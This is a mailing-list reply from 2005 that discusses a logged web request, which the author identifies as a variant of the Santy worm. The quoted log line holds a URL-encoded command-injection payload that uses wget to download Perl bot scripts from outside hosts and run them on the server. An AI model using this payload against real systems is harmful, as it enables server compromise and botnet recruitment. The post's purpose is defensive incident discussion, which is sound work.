Re: Attempted exploit for some web service.

[Andrew Smith <stfunub () gmail com>]

> 65.39.227.110 - - [28/Jan/2005:00:23:26 +1300]
> "GET /RobinsStuff/UnsortedLinks&r
> ush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.te
> mp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/
> .notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%6
> 5%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.
> %70%61%73%73%74%68%72%75%28%24%48%5
> 4%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200
> 11746 "-" "LWP::Simple/5.65"
This is a variant of the santy worm, i've been getting the same one
hit my server for the past few months. It's nothing to worry about, it
will be targetting you because MSN returned your website to it in a
web search for vulnerable scripts. I'm not familiar with the
vulnerability it's attacking but it's using the same exploit on my
server on a custom .php script. I assume MSN is returning incorrect
results. The source is no longer availiable but a Google shows it's
certainly been doing the rounds:
http://www.google.co.uk/search?hl=en&lr=&c2coff=1&safe=off&sa=G&q=%22weblicious.%2Bcom/.notes/ssh2.htm%22



-- 
zxy_rbt2